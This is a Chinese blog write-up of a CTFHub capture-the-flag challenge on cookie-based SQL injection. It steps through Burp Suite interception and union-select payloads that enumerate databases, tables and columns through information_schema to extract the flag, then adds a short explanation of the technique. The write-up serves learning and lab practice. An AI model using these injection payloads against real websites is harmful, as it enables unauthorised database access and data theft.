CTFHub | Cookie注入

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

Cookie注入:

        (无)

  网页显示内容

         

        

0x02 解题过程

        根据网页显示内容提示,这题关于 Cookie 注入,Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。

        

使用Burpsuite工具对题目网站进行抓包

         

使用'and 1 = 1'进行测试,判断是否存在sql注入

and 1 = 1

        

使用’and 1 = 2'进行测试,回显错误,说明存在sql注入

and 1 = 2

        

使用order by 判断字段数量,从order by 1开始

order by 1

        

判断字段2,使用order by 2

order by 2

        

判断字段3,使用order by 3,这里无回显,那么字段数量为2列

order by 3

        

知道字段数量为2后,可以查看数据库位置,使用union select 1,2查看未发现数据

union select 1,2

        

判断数据可能不存在数据库中,在id=1中加入负号查看数据,其他符号也可以

id=-1 union select 1,2

        

修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22

union select 1,version()

        

修改2为database(),查看数据库名,发现数据库版本为sqli

union select 1,database()

        

ⅩⅠ查看全部数据库名

union select 1,group_concat(schema_name)from information_schema.schemata

        

ⅩⅡ在全部数据库名中发现sqli,最后在sqli数据库中发现news和mrqonpoxwm两个表名

union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

        

ⅩⅢ先查看mrqonpoxwm表中的全部字段名,发现一个数据名为umzfngtnsk

union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='mrqonpoxwm'

        

ⅩⅣ查看数据umzfngtnsk中的内容,发现此题flag

union select 1,group_concat(umzfngtnsk) from sqli.mrqonpoxwm

        

        

0x03 Cookie 注入原理

        Cookie 注入的原理也和其他注入一样,只不过是将提交的参数已 Cookie 方式提交,而一般的注入是使用 GET 或者 POST 方式提交,GET 方式提交就是直接在网址后面加上需要注入的语句,POST 方式则是通过表单,GET 和 POST 的不同之处就在于可以通过 IE 地址栏处看到我们提交的参数,而 Cookie 注入却不能。

        

        

0x04 参考文献

[1].tooltime. cookie注入原理详解(一)[EB/OL]. [2022-11-20]. https://www.cnblogs.com/insane-Mr-Li/p/9142681.html.

        

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Cookie注入工具是一种用于进行网站漏洞测试和渗透测试的工具。它的作用是向目标网站发送恶意Cookie,以获取非法权限或者获取敏感信息。通常情况下,Cookie注入是指攻击者通过伪装成合法用户的身份,向目标网站发送带有恶意Cookie的HTTP请求,从而实现对网站的攻击或者获取用户数据的目的。 Cookie是网站使用的一种机制,用于存储用户的登录信息、会话状态以及个性化设置等数据。然而,当网站在处理Cookie时存在安全漏洞时,攻击者就可以利用Cookie注入工具来进行攻击。攻击者通过构造特定的恶意Cookie,来绕过网站的安全检查和认证控制,从而获得比合法用户更高的权限,例如管理员权限。 使用Cookie注入工具的攻击者可以对目标网站进行各种恶意操作,包括读取、修改、删除或添加敏感数据。例如,攻击者可以通过注入恶意Cookie,获取其他用户的个人信息、注入恶意代码、篡改网页内容或者劫持会话等。同时,攻击者还可以利用Cookie注入工具来进行跨站脚本攻击(XSS)或者会话劫持等攻击。 为了防止Cookie注入攻击,网站开发者需要加强对用户输入的过滤和验证,设置合理的安全策略,限制Cookie的范围和有效期,并进行定期的安全漏洞扫描和测试。对于安全研究人员和渗透测试人员来说,Cookie注入工具是一种重要的测试工具,可以帮助他们发现并修复网站的安全漏洞,提升网站的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值